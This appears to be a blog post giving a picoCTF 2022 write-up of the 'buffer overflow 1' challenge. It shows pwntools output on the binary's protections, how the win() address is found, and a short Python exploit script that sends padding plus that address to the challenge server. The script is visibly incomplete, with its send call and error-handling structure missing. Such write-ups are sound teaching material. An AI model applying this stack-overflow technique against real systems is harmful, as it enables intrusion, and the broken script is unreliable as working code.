Ulli Weichert/ April 5, 2022/ IT-Security, Write-Ups/ 0Kommentare

buffer overflow 1


Control the return address
Now we're cooking! You can overflow the buffer and return to the flag function in the program.
You can view source here. And connect with it using nc saturn.picoctf.net 51721


The links could be different.. the instance will be different (you have to launch your own in CTF)


This is a "normal" buffer overflow, not a really hard one. That is propably why even I could solve it 🙂 . We just need to change address of the return address to the address of the win(). To get this address I used the pwntools and the interactive python shell.

Python 3.10.2 (main, Jan 15 2022, 19:56:27) [GCC 11.1.0] on linux
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>>> from pwn import *
>>> vuln = ELF('vuln')
[*] '/home/ulli/Documents/CTF/picoCTF2022/binary_exploitation/buffer_overflow1/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
>>> p32(vuln.symbols['win'])

After I had everything I needed, I created a short script (standard script from tryhackme I think) to do the dirty work 🙂 .

#!/usr/bin/env python

from pwn import *

host,port = 'saturn.picoctf.net', 56565

prefix = ""
offset = 44
overflow = "A" * offset
retn = ""
padding = ""
payload= "\xf6\x91\x04\x08"
postfix = "" 

buffer = bytes(prefix + overflow + retn + padding + payload + postfix,"latin-1")

  s = remote(host, port)
  print("Sending evil buffer...")
  print("Buffer: " + str(buffer))
  flag = s.recv().decode('utf-8')
  print("Flag: " + flag)
  print("Could not connect.")

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Über Ulli Weichert

2004 fing Ulli bei der Bundeswehr als Ausbilder und IT-Spezialist an. 2011 hat Ulli eine Umschulung zum Fachinformatiker für Systemintegration absolviert und sich auf Linux spezialisiert. 2016 hat Ulli dann bei einem mittelständischem Unternehmen, welches Kunden in ganz Deutschland betreut, als Linuxadministrator angefangen und kümmert sich seither nebst, Netzwerk, Security, Firewall, Storage überwiegend um Linuxthemen aller Art. Seit kurzem hat auch Ihn das Thema Container und k8s erwischt.

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